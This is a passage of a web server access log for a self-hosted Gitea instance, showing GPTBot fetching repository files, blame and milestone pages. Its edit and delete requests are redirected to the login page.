"https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog.service" -[17/Feb/2026:16:19:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service" -[17/Feb/2026:16:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog.service" -[17/Feb/2026:16:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=furthestduedate&state=closed" [Client 74.7.227.38] [Length 8517] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?sort=closestduedate&state=closed" -[17/Feb/2026:16:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=closestduedate&state=closed" [Client 74.7.227.38] [Length 8515] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?sort=closestduedate&state=closed" -[17/Feb/2026:16:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=mostissues&state=closed" [Client 74.7.227.38] [Length 8521] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?sort=closestduedate&state=closed" -[17/Feb/2026:16:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9989] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:16:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:16:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 11080] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:16:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 11088] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:16:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=leastissues&state=closed" [Client 74.7.227.38] [Length 8518] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?sort=closestduedate&state=closed" -[17/Feb/2026:16:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=leastcomplete&state=closed" [Client 74.7.227.38] [Length 8514] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?sort=closestduedate&state=closed" -[17/Feb/2026:16:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=mostcomplete&state=closed" [Client 74.7.227.38] [Length 8521] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?sort=closestduedate&state=closed" -[17/Feb/2026:16:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 9852] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service" -[17/Feb/2026:16:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 11985] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service" -[17/Feb/2026:16:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 783] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service" -[17/Feb/2026:16:20:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 995] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service" -[17/Feb/2026:16:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 14451] [Gzip 11.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 2064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 9993] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 23048] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:16:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 39470] [Gzip 31.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:16:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11292] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 14533] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" -[17/Feb/2026:16:20:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog.service" -[17/Feb/2026:16:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog.service" -[17/Feb/2026:16:20:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/watchdog.service" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog.service" -[17/Feb/2026:16:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/watchdog.service" -[17/Feb/2026:16:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 12980] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" -[17/Feb/2026:16:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg?display=rendered" [Client 74.7.227.38] [Length 11134] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:16:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html?display=source" [Client 74.7.227.38] [Length 15745] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" -[17/Feb/2026:16:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" -[17/Feb/2026:16:20:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 74.7.227.38] [Length 11032] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:16:20:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 74.7.227.38] [Length 11032] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:16:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 74.7.227.38] [Length 11030] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:16:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 10499] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:16:20:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:16:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:16:20:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:16:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:16:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:16:20:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:16:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:16:20:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:16:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:16:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 15266] [Gzip 8.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:16:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:16:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:16:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 9832] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:16:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:16:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore?display=source" [Client 74.7.227.38] [Length 12041] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore" -[17/Feb/2026:16:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore?display=source" [Client 74.7.227.38] [Length 12042] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore" -[17/Feb/2026:16:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py?display=source" [Client 74.7.227.38] [Length 12344] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 